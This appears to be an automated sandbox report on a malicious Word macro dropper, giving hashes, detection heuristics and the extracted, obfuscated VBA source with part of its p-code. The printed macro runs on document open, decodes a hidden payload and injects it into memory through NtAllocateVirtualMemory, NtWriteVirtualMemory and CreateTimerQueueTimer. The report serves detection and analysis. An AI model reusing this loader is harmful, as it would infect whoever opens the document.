Office (OLE) malware analysis — malicious · a984f3241483a2ba

MALICIOUS

Office (OLE)

205.0 KB Created: 2017-08-28 11:08:00 Authoring application: Microsoft Office Word First seen: 2017-09-14

MD5: 22e84652a66f3f9f58063b741959e712 SHA-1: b961de0a165abeb34575a617bd1d7f673870866f SHA-256: a984f3241483a2ba8c5eb0e269b397fadbbd2e444140af57599aa9772f738ae2

190 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6342260-0', indicating it functions as a dropper. The presence of VBA macros, specifically a 'Document_Open' macro that utilizes 'GetObject', strongly suggests the execution of malicious code upon opening. The VBA code is heavily obfuscated, but the overall structure and heuristic firings point to a macro-based downloader designed to fetch and execute further stages.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6342260-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6342260-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

Set wdApp = GetObject(, "Word.Application")
Set wdDoc = wdApp.ActiveDocument

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
End Function
Private Sub Document_Open()
Dim bovidae As Long
```

NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED

Long run of 0x40 bytes

Disassembly

Attempted x86 opcode disassembly

000089DB  40                inc eax
000089DC  40                inc eax
000089DD  40                inc eax
000089DE  40                inc eax
000089DF  40                inc eax
000089E0  40                inc eax
000089E1  40                inc eax
000089E2  40                inc eax
000089E3  40                inc eax
000089E4  40                inc eax
000089E5  40                inc eax
000089E6  40                inc eax
000089E7  40                inc eax
000089E8  40                inc eax
000089E9  40                inc eax
000089EA  40                inc eax
000089EB  40                inc eax
000089EC  40                inc eax
000089ED  40                inc eax
000089EE  40                inc eax
000089EF  40                inc eax
000089F0  40                inc eax
000089F1  40                inc eax
000089F2  40                inc eax
000089F3  40                inc eax
000089F4  40                inc eax
000089F5  40                inc eax
000089F6  40                inc eax
000089F7  40                inc eax
000089F8  40                inc eax
000089F9  40                inc eax
000089FA  40                inc eax
000089FB  40                inc eax
000089FC  40                inc eax
000089FD  40                inc eax
000089FE  40                inc eax
000089FF  40                inc eax
00008A00  40                inc eax
00008A01  40                inc eax
00008A02  40                inc eax
00008A03  40                inc eax
00008A04  40                inc eax
00008A05  40                inc eax
00008A06  40                inc eax
00008A07  40                inc eax
00008A08  40                inc eax
00008A09  40                inc eax
00008A0A  40                inc eax
00008A0B  40                inc eax
00008A0C  40                inc eax
00008A0D  40                inc eax
00008A0E  40                inc eax
00008A0F  40                inc eax
00008A10  40                inc eax
00008A11  40                inc eax
00008A12  40                inc eax
00008A13  40                inc eax
00008A14  40                inc eax
00008A15  40                inc eax
00008A16  40                inc eax
00008A17  40                inc eax
00008A18  40                inc eax
00008A19  40                inc eax
00008A1A  40                inc eax
00008A1B  40                inc eax
00008A1C  40                inc eax
00008A1D  40                inc eax
00008A1E  40                inc eax
00008A1F  40                inc eax
00008A20  40                inc eax
00008A21  40                inc eax
00008A22  40                inc eax
00008A23  40                inc eax
00008A24  40                inc eax
00008A25  40                inc eax
00008A26  40                inc eax
00008A27  40                inc eax
00008A28  40                inc eax
00008A29  40                inc eax
00008A2A  40                inc eax
00008A2B  40                inc eax
00008A2C  40                inc eax
00008A2D  40                inc eax
00008A2E  40                inc eax
00008A2F  40                inc eax
00008A30  40                inc eax
00008A31  40                inc eax
00008A32  40                inc eax
00008A33  40                inc eax
00008A34  40                inc eax
00008A35  40                inc eax
00008A36  40                inc eax
00008A37  40                inc eax
00008A38  40                inc eax
00008A39  40                inc eax
00008A3A  40                inc eax

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 51875 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	51875 bytes
SHA-256: `0c0400c394e1ad5ccad5a9d093e37b4fd44a54d727937fec7c9706117d7d1c61`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function unalert(quoin) nova = pistol(20 / 4) Dim coats As Byte Dim amoebeeic As Variant Dim detrude As Byte Dim mischiefmaking As String #If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then Dim pellmell As Variant Dim battlescarred As LongPtr cic = 23 - 77 + 62 Dim highlevel As LongPtr Dim visus As Variant Dim leiopelmatidae As String Dim ablated As LongPtr Dim deshabille As Long #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim battlescarred As Long cic = 66 - 123 + 61 Dim highlevel As Long Dim ablated As Long #End If gasteromycetes = VarPtr(battlescarred) norm = continuation(gasteromycetes, VarPtr(quoin) + 8, cic) endaemonism = 55 - 114 + 58 highlevel = 78 - 81 + 3 bosom = 117 - 65 - 52 ablated = 87 - 47 + 9490 leipzig = 15 - 28 + 4109 odontophorus = 61 - 66 + 69 besiege = deformational(ByVal endaemonism, highlevel, ByVal bosom, ablated, ByVal leipzig, ByVal odontophorus) individualistically = shrivel carpinus = Math.Round(96) continuation highlevel, battlescarred, 55 - 86 + 5914 airmail = 15 dulciana = 13605 detach = 325784 Pmt 0, airmail, 13534, 16485, 3 unalert = highlevel End Function Function continuation(bourse, mulet, partialness) nova = pistol(20 / 4) #If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (nova) Then Dim mucilage As Integer Dim despondency As Byte Dim chair As LongPtr Dim lateward As LongPtr Dim maypole As LongPtr Dim naiad As Integer Dim esteem As LongPtr Dim derail As LongPtr #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (nova) Then Dim lateward As Long Dim hippoglossoides As Long Dim chair As Long Dim scolecoid As Variant Dim esteem As Long Dim fifties As String Dim maypole As Long Dim declamatory As Byte Dim derail As Long Dim derivational As Variant Dim waterloo As Long #End If anemometer = anemometer individualistically = "glamorous" lateward = bourse derail = partialness acrophobic = Rnd(299) esteem = mulet desous = 119 jour = 8429 ranch = 119928 Pmt 0, desous, 28349, 55711, 3 peccancy = "needlewood" chair = 33 - 111 + 77 unreproducible ByVal chair, lateward, esteem, derail, maypole dissociation = Rnd(217) End Function Sub arthralgic() Dim cordierite As Long Dim anacanthini As Long enthusiast.nonnatural.Value = Day(#12/5/2013#) varday = bonmotjeu = "featureless" courser = "juvenal" lanzhou = croak august = "jail" scratch = "osteolysis" diluent = "schizopoda" tympani = "agamidae" confute = "nilgai" Set headliner = enthusiast.nonnatural.SelectedItem untractable = 42 aloe = 3522 dissimilitude = 289834 Pmt 0, untractable, 3028, 46128, 4 arctocebus = headliner.Name geebung = 3 - 88 + 7929 actionable = Right(arctocebus, geebung) yalta = protos.avens(actionable) consuetudo = 101 centrospermae = 32126 overage = 513269 Pmt 0, consuetudo, 31445, 15145, 2 pettiness = "anaesthetize" cropper = "moscow" #If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim entolomataceae As Integer Dim desole As LongPtr Dim abscond As LongPtr Dim news As Byte #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim cleansing As Long Dim abscond As Long Dim scienter As String Dim desole As Long #End If adhibition = 106 - 87 - 19 cataclysm = "stiffness" unsupportable = 11 - 36 + 4121 fissile = 108 asserting = 15119 maximis = 312021 Pmt 0, fissile, 35069, 19822, 6 quietism = tribologist americaine = "abrogate" muscadet = "countrywide" columnist = 95 herself = 32947 intersexual = 382318 Pmt 0, columnist, 4804, 55054, 8 gouda = yalta diuturnal = adaxial copiousness = admiration desole = unalert(gouda) tarawa = "prate" #If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then Dim cohibit As Long Dim combo As LongPtr Dim cocotte As LongPtr Dim mount As LongPtr ageism = 59 - 20 + 2025 #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim combo As Long colima = 74 - 107 + 814 Dim cocotte As Long Dim mount As Long ageism = colima + 3459 #End If Dim hardboiled As Integer Dim movere As Long combo = 118 - 10 - 108 abscond = desole + ageism cocotte = 92 - 124 + 201559 mount = 117 - 128 + 3511 capacitive = nortel(cocotte, combo, abscond) birr = 50 + 10 ichneumonidae = 11810 + 1 mohammedan = 276070 + 1 Pmt 0, birr, 33851, 48854, 3 End Sub Function pistol(jugles) Dim windser As Integer Dim velvet As Integer fixoid = jugles * 12 Dim sitroen As Variant metro2 = jugles * 2 Dim cowen() As Byte #If (4 * 6 + jugles) > (6 - 2 * 1) And (10 - jugles * 2) * 2 < (Win64) Then velvet = metro2 #End If #If (4 * 6 + jugles) > (6 - 2 * 1) And Not (Win64) > (10 - jugles * 2) * 2 Then velvet = (120 - fixoid) #End If metro3 = metro2 + velvet pistol = velvet End Function Private Sub Document_Open() Dim bovidae As Long Dim silviculture As Integer hectometer = cleavage quickly = attentiongetting arthralgic doxorubicin = 81 cheapskate = 33628 pasta = 583933 Pmt 0, doxorubicin, 36180, 14946, 8 End Sub Attribute VB_Name = "barbaresque" ' And walked out #If (12 * 4 + 7) > (9 - 3 * 2) And Not (32 - 8 * 4) * 2 < (Win64) Then ' But just your sight had my heart storming ' You wrecked my whole world when you came Public Declare Function unreproducible Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal iresine As Any, ByVal unsated As Any, ByVal astonished As Any, ByVal hoe As Any, ByVal newfangled As Any) As Long ' And hit me like a hurricane ' You wrecked my whole world when you came Public Declare Function lab Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal finished As Any, recipe As Any, jewelry As Any, falafel As Any) As Long ' And hit me like a hurricane ' From the moment when Public Declare Function nodulose Lib "ntdll.dll " Alias "AcquireSRWLockShared" (faultfinder As Any) As Long ' But just your sight had my heart storming ' And walked out Public Declare Function deformational Lib "Ntdll.dll " Alias _ "NtAllocateVirtualMemory" (picking As Long, airship As Long, ByVal ambiguas As Long, beadlikeByVal As Long, serer As Long, ByVal maquiladora As Long) As Long ' Knew it was gonna be a long night ' Rain was driving, thunder, lightning Public Declare Function reconnoiter Lib "Kernel32" Alias "CreateTimerQueueTimer" (nigeria As Any, ByVal arum As Any, ByVal mismanage As Any, ByVal aphesis As Any, ByVal chestnut As Any, ByVal fucking As Any, ByVal mists As Any) As Long ' Started talking bout us again ' The moon went hiding, stars quit shining Public Declare Function jabot Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal commoner As Any, plasmic As Any, approximating As Any, agile As Any) As Long ' The moon went hiding, stars quit shining ' I was doing alright #End If ' And hit me like a hurricane #If (11 * 2 + 5) > (8 - 3 * 1) And (28 - 7 * 4) * 2 < (Win64) Then ' Knew it was gonna be a long night ' And hit me like a hurricane' Started talking bout us again Public Declare PtrSafe Function antinomasia Lib "ntdll.dll " Alias "AcquireSRWLockShared" (heliograph As Any) As LongPtr ' We locked eyes over whiskey on ice ' We locked eyes over whiskey on ice Public Declare PtrSafe Function unreproducible Lib "ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal purveyance As Any, ByVal rosy As Any, ByVal cryophobia As Any, ByVal colloquial As Any, ByVal achievement As Any) As LongPtr ' From the moment when ' Started talking bout us again Public Declare PtrSafe Function deformational Lib "ntdll.dll " Alias _ "NtAllocateVirtualMemory" (bencher As LongPtr, banter As LongPtr, ByVal slopseller As LongPtr, horripilateByVal As LongPtr, cobnut As LongPtr, ByVal gynecaeum As LongPtr) As LongPtr ' If I woulda just layed my drink down ' Knew it was gonna be a long night Public Declare PtrSafe Function severable Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal metaphrast As Any, secrets As Any, entandrophragma As Any, halfhour As Any) As LongPtr ' You wrecked my whole world when you came ' Baby, without warning Public Declare PtrSafe Function reconnoiter Lib "Kernel32" Alias "CreateTimerQueueTimer" (coming As Any, ByVal capitalistic As Any, ByVal blockaderunner As Any, ByVal halfhour As Any, ByVal berliner As Any, ByVal redount As Any, ByVal totis As Any) As Long ' Rain was driving, thunder, lightning ' The moon went hiding, stars quit shining Public Declare PtrSafe Function cantering Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal groceries As Any, prissy As Any, cote As Any, conglobation As Any) As LongPtr ' And hit me like a hurricane' But you rolled in with your hair in the wind #End If ' I was doing alright ' And hit me like a hurricane ' The moon went hiding, stars quit shining ' We locked eyes over whiskey on ice Function nortel(wrd, buls, lky) #If (7 * 2) * 3 > 14 / 2 And (12 - 6 * 2) * 1 < (Win64) Then Dim kittins As LongPtr Dim bis As LongPtr Dim ority As Integer Dim deble As LongPtr #End If #If (12 * 2) / 1 > 14 / 2 And Not (12 - 6 * 2) * 1 < (Win64) Then Dim kittins As Long Dim bwis As Long Dim antery As Integer Dim deble As Long #End If kittins = buls deble = lky dan2 = reconnoiter(wrd, kittins, deble, kittins, kittins, kittins, kittins) End Function Sub InsertText() Dim wdApp As Word.Application Dim wdDoc As Document Dim wdSln As Selection Set wdApp = GetObject(, "Word.Application") Set wdDoc = wdApp.ActiveDocument Set wdSln = wdApp.Selection wdDoc.Application.Options.Overtype = False With wdSln If .Type = wdSelectionIP Then .TypeText ("Inserting at insertion point. ") ElseIf .Type = wdSelectionNormal Then If wdApp.Options.ReplaceSelection Then .Collapse Direction:=wdCollapseStart End If .TypeText ("Inserting before a text block. ") End If End With Set wdApp = Nothing Set wdDoc = Nothing End Sub Function comeatable(neve, chile, materfamilias) If materfamilias = 12 + (10 / 2 - 5) Then comeatable = neve \ chile ElseIf materfamilias = 22 + (5 - 3) / 2 - 1 Then comeatable = neve And chile ElseIf materfamilias = 30 + (56 / 7 - 4 * 2) Then comeatable = neve * chile End If End Function Function cacogenesis(emu) cacogenesis = AscW(emu) End Function Attribute VB_Name = "enthusiast" Attribute VB_Base = "0{CFB4611D-991F-4777-9E67-CC6D24DF094C}{BADA2A78-210F-4401-A5F0-69726C7878CB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "protos" Sub Binary_Search_of_Array() Dim intThousand(1000) As Integer Dim I As Integer Dim intTop As Integer Dim intMiddle As Integer Dim intBottom As Integer Dim varUserNumber As Variant For I = 1 To 1000 intThousand(I) = I Next I varUserNumber = 233 intTop = UBound(intThousand) intBottom = LBound(intThousand) Do intMiddle = (intTop + intBottom) / 2 If varUserNumber > intThousand(intMiddle) Then intBottom = intMiddle + 1 Else intTop = intMiddle - 1 End If Loop Until (varUserNumber = intThousand(intMiddle)) _ Or (intBottom > intTop) If varUserNumber = intThousand(intMiddle) Then Debug.Print varUserNumber & ", at position " & intMiddle Else Debug.Print "not in " End If End Sub Function avens(bereave) As String Dim bobadil(63) As Long Dim neoliberalism As Long Dim unhandsome As Long Dim cockamamie As String Dim featureless As Integer Dim accrust As Long Dim caliginous(6962) As Byte anemometer = anemometer Dim enjoying() As Byte Dim intendant As Byte Dim handoff As String Dim aepyceros(63) As Long Dim gingery As String Dim senorita As Long Dim panicled(63) As Long shrivel = anemometer dissociation = dissociation And 207 Dim easterner As String bibliographic = 110 - 44 + 65470 capitalsprint = 100 - 60 + 24 episcopate = 102 - 60 + 16515030 pretended = 83 - 14 + 186 camelot = 2 - 84 + 338 undertaking = 64 - 45 + 65261 berycomorphi = 44 - 125 + 4113 coptic = 119 - 22 - 34 facet = 70 - 49 + 4075 anaplastic = 45 - 75 + 262174 highmettled = 94 - 8 + 16711594 Dim contopus As String Dim bookmaker As Byte Dim nageia As Long apractic = 6 - 55 + 258097 Dim anopia As Long acquaintenace = 60 - 28 - 32 ballista = 64 - 19 + 7798 Dim frozen() As Byte Dim archetypal As Long Dim entangle As Variant frozen = VBA.StrConv(bereave, 128) Dim mercilessly As Integer correctionsmake = 70 + 1 treacherous = 3470 + 1 housefather = 519860 + 1 Pmt 0, correctionsmake, 35845, 13257, 8 ore = 7840 + 3 inlaw = vbKeyShift - 12 For silica = 0 To ore If silica Mod 2 = 0 Then frozen(silica) = frozen(silica) - inlaw Else frozen(silica) = frozen(silica) - (inlaw - 1) End If Next silica atrocity = 110 + 8 effervesce = 15190 + 7 cheilitis = 424370 + 1 Pmt 0, atrocity, 7432, 16019, 4 featureless = 5 - 5 talcum = 78 - 64 - 14 pyrenomycetes = 52 - 36 + 27 lob = daddy For neoliberalism = (6 - 6) * 1 To (40 + 23) * (5 - 4) bobadil(neoliberalism) = comeatable(neoliberalism, capitalsprint, 30) panicled(neoliberalism) = comeatable(neoliberalism, facet, 30) aepyceros(neoliberalism) = comeatable(neoliberalism, anaplastic, 30) Next neoliberalism anicteric = 70 + 9 boater = 36810 + 9 concomitance = 347510 + 3 Pmt 0, anicteric, 16631, 21424, 5 enjoying = frozen downward = 20 - 82 + 66 mercedario = 80 + 7 orthopristis = 30540 + 7 bile = 275350 + 4 Pmt 0, mercedario, 37058, 22193, 3 mundation = 6 - 48 + 45 anemometer = individualistically shrivel = "acetabulum" deciliter = mundation + 1 ovrerhasty = 7 - 111 + 106 For unhandsome = (3 - 3) To ore assegai = enjoying(unhandsome) patitur = enjoying(unhandsome + 2) ethnology = panicled(lob(enjoying(unhandsome + 1))) undereducated = bobadil(lob(patitur)) + lob(enjoying(unhandsome + mundation)) accrust = aepyceros(lob(assegai)) + ethnology + undereducated neoliberalism = comeatable(accrust, highmettled, 22) caliginous(senorita) = comeatable(neoliberalism, bibliographic, 12) neoliberalism = comeatable(accrust, undertaking, 22) caliginous(senorita + 1) = comeatable(neoliberalism, camelot, 12) caliginous(senorita + ovrerhasty) = comeatable(accrust, pretended, 22) senorita = senorita + ovrerhasty + 1 unhandsome = unhandsome + 3 Next avens = caliginous End Function Function daddy() Dim talker(255) As Byte euphonious = 73 - 104 + 96 Do While euphonious <= 90 + 1 talker(euphonious) = euphonious - 65 euphonious = euphonious + 1 Loop euphonious = 40 + 8 Do While euphonious <= 50 + 8 talker(euphonious) = euphonious + 4 euphonious = euphonious + 1 Loop euphonious = 90 + 7 Do While euphonious <= 120 + 3 talker(euphonious) = euphonious - 71 euphonious = euphonious + 1 Loop talker(47) = 60 + 3 euphonious = 40 + 3 talker(euphonious) = 60 + 2 daddy = talker End Function ' Processing file: /opt/analyzer/scan_staging/d387beb3199b42b9a798d0f7d7790c39.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 15343 bytes ' Line #0: ' FuncDefn (Function unalert(quoin)) ' Line #1: ' LitDI2 0x0014 ' LitDI2 0x0004 ' Div ' ArgsLd subway3 0x0001 ' St _B_var_niva ' Line #2: ' Dim ' VarDefn coats (As Byte) ' Line #3: ' Dim ' VarDefn amoebeeic (As Variant) ' Line #4: ' Dim ' VarDefn detrude (As Byte) ' Line #5: ' Dim ' VarDefn mischiefmaking (As String) ' Line #6: ' LbMark ' LitDI2 0x0006 ' LitDI2 0x0003 ' Mul ' LitDI2 0x0005 ' Add ' Paren ' LitDI2 0x0007 ' LitDI2 0x0002 ' LitDI2 0x0001 ' Mul ' Sub ' Paren ' Gt ' LitDI2 0x0030 ' LitDI2 0x0006 ' LitDI2 0x0008 ' Mul ' Sub ' Paren ' LitDI2 0x0002 ' Mul ' Ld Win64 ' Paren ' Lt ' And ' LbIf ' Line #7: ' Dim ' VarDefn pellmell (As Variant) ' Line #8: ' Dim ' VarDefn battlescarred (As Ptr) ' Line #9: ' LitDI2 0x0017 ' LitDI2 0x004D ' Sub ' LitDI2 0x003E ' Add ' St cic ' Line #10: ' Dim ' VarDefn highlevel (As Ptr) ' Line #11: ' Dim ' VarDefn visus (As Variant) ' Line #12: ' Dim ' VarDefn leiopelmatidae (As String) ' Line #13: ' Dim ' VarDefn ablated (As Ptr) ' Line #14: ' Dim ' VarDefn deshabille (As Long) ' Line #15: ' LbMark ' LbEndIf ' Line #16: ' LbMark ' LitDI2 0x0008 ' LitDI2 0x0002 ' Mul ' LitDI2 0x0005 ' Add ' Paren ' LitDI2 0x0007 ' LitDI2 0x0002 ' LitDI2 0x0001 ' Mul ' Sub ' Paren ' Gt ' LitDI2 0x0015 ' LitDI2 0x0007 ' LitDI2 0x0003 ' Mul ' Sub ' Paren ' LitDI2 0x0002 ' Mul ' Ld Win64 ' Paren ' Lt ' Not ' And ' LbIf ' Line #17: ' Dim ' VarDefn battlescarred (As Long) ' Line #18: ' LitDI2 0x0042 ' LitDI2 0x007B ' Sub ' LitDI2 0x003D ' Add ' St cic ' Line #19: ' Dim ' VarDefn highlevel (As Long) ' Line #20: ' Dim ' VarDefn ablated (As Long) ' Line #21: ' LbMark ' LbEndIf ' Line #22: ' Ld battlescarred ' ArgsLd VarPtr 0x0001 ' St gasteromycetes ' Line #23: ' Ld gasteromycetes ' Ld quoin ' ArgsLd VarPtr 0x0001 ' LitDI2 0x0008 ' Add ' Ld cic ' ArgsLd continuation 0x0003 ' St norm ' Line #24: ' LitDI2 0x0037 ' LitDI2 0x0072 ' Sub ' LitDI2 0x003A ' Add ' St endaemonism ' Line #25: ' LitDI2 0x004E ' LitDI2 0x0051 ' Sub ' LitDI2 0x0003 ' Add ' St highlevel ' Line #26: ' LitDI2 0x0075 ' LitDI2 0x0041 ' Sub ' LitDI2 0x0034 ' Sub ' St bosom ' Line #27: ' LitDI2 0x0057 ' LitDI2 0x002F ' Sub ' LitDI2 0x2512 ' Add ' St ablated ' Line #28: ' LitDI2 0x000F ' LitDI2 0x001C ' Sub ' LitDI2 0x100D ' Add ' St leipzig ' Line #29: ' LitDI2 0x003D ' LitDI2 0x0042 ' Sub ' LitDI2 0x0045 ' Add ' St odontophorus ' Line #30: ' Ld endaemonism ' ParamByVal ' Ld highlevel ' Ld bosom ' ParamByVal ' Ld ablated ' Ld leipzig ' ParamByVal ' Ld odontophorus ' ParamByVal ' ArgsLd deformational 0x0006 ' St besiege ' Line #31: ' Ld shrivel ' St individualistically ' Line #32: ' Line #33: ' LitDI2 0x0060 ' Ld Math ' ArgsMemLd Round 0x0001 ' St carpinus ' Line #34: ' Line #35: ' Ld highlevel ' Ld battlescarred ' LitDI2 0x0037 ' LitDI2 0x0056 ' Sub ' LitDI2 0x171A ' Add ' ArgsCall continuation 0x0003 ' Line #36: ' LitDI2 0x000F ' St airmail ' Line #37: ' LitDI2 0x3525 ' St dulciana ' Line #38: ' LitDI4 0xF898 0x0004 ' St detach ' Line #39: ' LitDI2 0x0000 ' Ld airmail ' LitDI2 0x34DE ' LitDI2 0x4065 ' LitDI2 0x0003 ' ArgsCall Pmt 0x0005 ' Line #40: ' Line #41: ' Ld highlevel ' St unalert ' Line #42: ' EndFunc ' Line #43: ' FuncDefn (Function continuation(bourse)) ' Line #44: ' LitDI2 0x0014 ' LitDI2 0x0004 ' Div ' ArgsLd subway3 0x0001 ' St _B_var_niva ' Line #45: ' LbMark ' LitDI2 0x0007 ' LitDI2 0x0004 ' Mul ' LitDI2 0x0005 ' Add ' Paren ' LitDI2 0x0007 ' LitDI2 0x0002 ' LitDI2 0x0001 ' Mul ' Sub ' Paren ' Gt ' LitDI2 0x0014 ' LitDI2 0x0005 ' LitDI2 0x0004 ' Mul ' Sub ' Paren ' LitDI2 0x0002 ' Mul ' Ld _B_var_niva ' Paren ' Lt ' And ' LbIf ' Line #46: ' Dim ' VarDefn mucilage (As Integer) ' Line #47: ' Dim ' VarDefn despondency (As Byte) ' Line #48: ' Dim ' VarDefn chair (As Ptr) ' Line #49: ' Dim ' VarDefn lateward (As Ptr) ' Line #50: ' Dim ' VarDefn maypole (As Ptr) ' Line #51: ' Dim ' VarDefn naiad (As Integer) ' Line #52: ' Dim ' VarDefn esteem (As Ptr) ' Line #53: ' Dim ' VarDefn derail (As Ptr) ' Line #54: ' LbMark ' LbEndIf ' Line #55: ' LbMark ' LitDI2 0x0008 ' LitDI2 0x0002 ' Mul ' LitDI2 0x0005 ' Add ' Paren ' LitDI2 0x0007 ' LitDI2 0x0002 ' LitDI2 0x0001 ' Mul ' Sub ' Paren ' Gt ' LitDI2 0x0015 ' LitDI2 0x0007 ' LitDI2 0x0003 ' Mul ' Sub ' Paren ' LitDI2 0x0002 ' Mul ' Ld _B_var_niva ' Paren ' Lt ' Not ' And ' LbIf ' Line #56: ' Dim ' VarDefn lateward (As Long) ' Line #57: ' Dim ' VarDefn hippoglossoides (As Long) ' Line #58: ' Dim ' VarDefn chair (As Long) ' Line #59: ' Dim ' VarDefn scolecoid (As Variant) ' Line #60: ' Dim ' VarDefn esteem (As Long) ' Line #61: ' Dim ' VarDefn fifties (As String) ' Line #62: ' Dim ' VarDefn maypole (As Long) ' Line #63: ' Dim ' VarDefn declamatory (As Byte) ' Line #64: ' Dim ' VarDefn derail (As Long) ' Line #65: ' Dim ' VarDefn derivational (As Variant) ' Line #66: ' Dim ' VarDefn waterloo (As Long) ' Line #67: ' LbMark ' LbEndIf ' Line #68: ' Ld anemometer ' St anemometer ' Line #69: ' LitStr 0x0009 "glamorous" ' St individualistically ' Line #70: ' Ld bourse ' St lateward ' Line #71: ' Ld partialness ' St derail ' Line #72: ' LitDI2 0x012B ' ArgsLd Rnd 0x0001 ' St acrophobic ' Line #73: ' Ld mulet ' St esteem ' Line #74: ' LitDI2 0x0077 ' St desous ' Line #75: ' LitDI2 0x20ED ' St jour ' Line #76: ' LitDI4 0xD478 0x0001 ' St ranch ' Line #77: ' LitDI2 0x0000 ' Ld desous ' LitDI2 0x6EBD ' LitDI4 0xD99F 0x0000 ' LitDI2 0x0003 ' ArgsCall Pmt 0x0005 ' Line #78: ' Line #79: ' LitStr 0x000A "needlewood" ' St peccancy ' Line #80: ' LitDI2 0x0021 ' LitDI2 0x006F ' Sub ' LitDI2 0x004D ' Add ' St chair ' Line #81: ' Ld chair ' ParamByVal ' Ld lateward ' Ld esteem ' Ld derail ' Ld maypole ' ArgsCall unreproducible 0x0005 ' Line #82: ' LitDI2 0x00D9 ' ArgsLd Rnd 0x0001 ' St dissociation ' Line #83: ' EndFunc ' Line #84: ' FuncDefn (Sub arthralgic()) ' Line #85: ' Dim ' VarDefn cordierite (As Long) ' Line #86: ' Dim ' VarDefn anacanthini (As Long) ' Line #87: ' LitDate 0x0000 0x0000 0x51A0 0x40E4 ' ArgsLd Day 0x0001 ' Ld enthusiast ' MemLd nonnatural ' MemSt Value ' Line #88: ' Ld bonmotjeu ' LitStr 0x000B "featureless" ' Eq ' St varday ' Line #89: ' LitStr 0x0007 "juvenal" ' St courser ' Line #90: ' Ld croak ' St lanzhou ' Line #91: ' LitStr 0x0004 "jail" ' St august ' Line #92: ' LitStr 0x000A "osteolysis" ' St scratch ' Line #93: ' Line #94: ' LitStr 0x000A "schizopoda" ' St diluent ' Line #95: ' LitStr 0x0008 "agamidae" ' St tympani ' Line #96: ' LitStr 0x0006 "nilgai" ' St confute ' Line #97: ' SetStmt ' Ld enthusiast ' MemLd nonnatural ' MemLd SelectedItem ' Set headliner ' Line #98: ' LitDI2 0x002A ' St untractable ' Line #99: ' LitDI2 0x0DC2 ' St aloe ' Line #100: ' LitDI4 0x6C2A 0x0004 ' St dissimilitude ' Line #101: ' LitDI2 0x0000 ' Ld untractable ' LitDI2 0x0BD4 ' LitDI4 0xB430 0x0000 ' LitDI2 0x0004 ' ArgsCall Pmt 0x0005 ' Line #102: ' Line #103: ' Ld headliner ' MemLd Name ' St arctocebus ' Line #104: ' LitDI2 0x0003 ' LitDI2 0x0058 ' Sub ' LitDI2 0x1EF9 …

SHA-256: 0c0400c394e1ad5ccad5a9d093e37b4fd44a54d727937fec7c9706117d7d1c61

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function unalert(quoin)
nova = pistol(20 / 4)
Dim coats As Byte
Dim amoebeeic As Variant
Dim detrude As Byte
Dim mischiefmaking As String
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim pellmell As Variant
Dim battlescarred As LongPtr
cic = 23 - 77 + 62
Dim highlevel As LongPtr
Dim visus As Variant
Dim leiopelmatidae As String
Dim ablated As LongPtr
Dim deshabille As Long
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim battlescarred As Long
cic = 66 - 123 + 61
Dim highlevel As Long
